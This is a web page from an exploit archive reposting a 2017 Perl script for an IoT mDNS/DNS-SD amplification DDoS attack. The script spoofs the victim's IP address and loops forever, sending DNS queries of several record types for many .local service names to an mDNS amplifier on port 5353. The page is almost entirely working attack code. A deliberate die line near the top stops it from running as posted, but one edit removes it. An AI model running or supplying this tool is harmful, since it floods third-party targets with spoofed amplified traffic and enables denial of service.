首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IoT mDNS/DNS-SD QM Amplification Distributed Denial Of Service
来源:https://www.ethical-hacker.org/ 作者:Donev 发布时间:2017-07-06  
#!/usr/bin/perl
#
#  IoT mDNS/DNS-SD 'QM' amplification ddos
#
#  Copyright 2017 (c) Todor Donev 
#  todor.donev@gmail.com
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#
#  Disclaimer:
#  This or previous program is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#
#  Use at your own risk and educational 
#  purpose ONLY!
#
#  See also, UDP-based Amplification Attacks:
#  https://www.us-cert.gov/ncas/alerts/TA14-017A
#
#
#

use Net::RawIP;
use Net::DNS;
use Data::Validate::IP qw(is_ipv4);

my ($target, $mdnsamp) = @ARGV;
my  $port = '5353';
die("r34d 7h3 c0d3 m0r0n\n");
die "[ Error: Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);
die "[ Usage: perl ___FCKpd___0 <target> <mdns amplificator>\n" unless (scalar @ARGV)==2;
die "[ Error: Invalid IP address\n"  if not is_ipv4(@ARGV);

@domains = qw(
_workstation.tcp.local
_http._tcp.local
_ipp._tcp.local
_services._tcp.local
_workstation.udp.local
_services._udp.local
_device-info._udp.local
_services._dns-sd._udp.local
_services._dns-sd._tcp.local
_rfb._tcp.local
_touch-able._tcp.local
_home-sharing._tcp.local
_hap._tcp.local
_net-assistant._udp.local
_afpovertcp._tcp.local
_smb._tcp.local
_sftp-ssh._tcp.local
_ssh._tcp.local
_scanner._tcp.local
_uscan._tcp.local
_http-alt._tcp.local
_appletv-itunes._tcp.local
_raop._tcp.local
_touch-remote._tcp.local
_dacp._tcp.local
_printer._tcp.local
_music._tcp.local
_readynas._tcp.local
_pdl-datastream._tcp.local
_tivo-videos._tcp.local
_csco-sb._tcp.local
);
 
print "[ IoT mDNS/DNS-SD 'QM' amplification ddos\n";
print "[ === \n";
print "[ Copyright 2017 (c) Todor Donev\n";
print "[ todor.donev\@gmail.com\n";
print "[ https://www.ethical-hacker.org/\n";
print "[ https://www.facebook.com/ethicalhackerorg\n";

while(){
for (my $j=0; $j<=@domains; $j++) {
     			my $NSQueryPak = new Net::DNS::Packet($domains[$j], "NS", "IN");
      			my $nsdata = $NSQueryPak->data;
      			my $AQueryPak = new Net::DNS::Packet($domains[$j], "A", "IN");
      			my $adata = $AQueryPak->data;
      			my $TXTQueryPak = new Net::DNS::Packet($domains[$j], "TXT", "IN");
      			my $txtdata = $TXTQueryPak->data;
      			my $ANYQueryPak = new Net::DNS::Packet($domains[$j], "ANY", "IN");
      			my $anydata = $ANYQueryPak->data;
      			my $PTRQueryPak = new Net::DNS::Packet($domains[$j], "PTR", "IN");
      			my $ptrdata = $PTRQueryPak->data;
      			my $SRVQueryPak = new Net::DNS::Packet($domains[$j], "SRV", "IN");
      			my $srvdata = $SRVQueryPak->data;

my $sock =  new Net::RawIP({ udp => {} }) or die "[ Error: $!\n";
   $sock->set({ ip =>  { saddr  => $target, daddr => $mdnsamp},
     	        udp => { source => 31337,
     		     dest   => $port,
     		     data   => $adata}}) or die "[ Error: $!\n";
   $sock->send;
   $sock->set({udp => { data=>$txtdata }});
   $sock->send;
   $sock->set({udp => { data=>$anydata }});
   $sock->send;
   $sock->set({udp => { data=>$srvdata }});
   $sock->send;
   $sock->set({udp => { data=>$ptrdata }});
   $sock->send;
   $sock->set({udp => { data=>$nsdata }});
   $sock->send;
   select(undef, undef, undef, 0.20);
}
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·rpcinfo Portmap DUMP Call Ampl
·Firefox 54.0.1 - Denial of Ser
·Lepide Auditor Suite - 'create
·Yaws 1.91 - Remote File Disclo
·GoAutoDial 3.3 - Authenticatio
·Easy File Sharing Web Server 7
·Humax HG100R 2.0.6 - Backup Fi
·DNS/DNSSEC RR Stub Resolver De
·ActiveMQ < 5.14.0 - web shell
·WMI Event Subscription Persist
·Veritas/Symantec Backup Exec -
·Microsoft Windows Windows 7/8.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved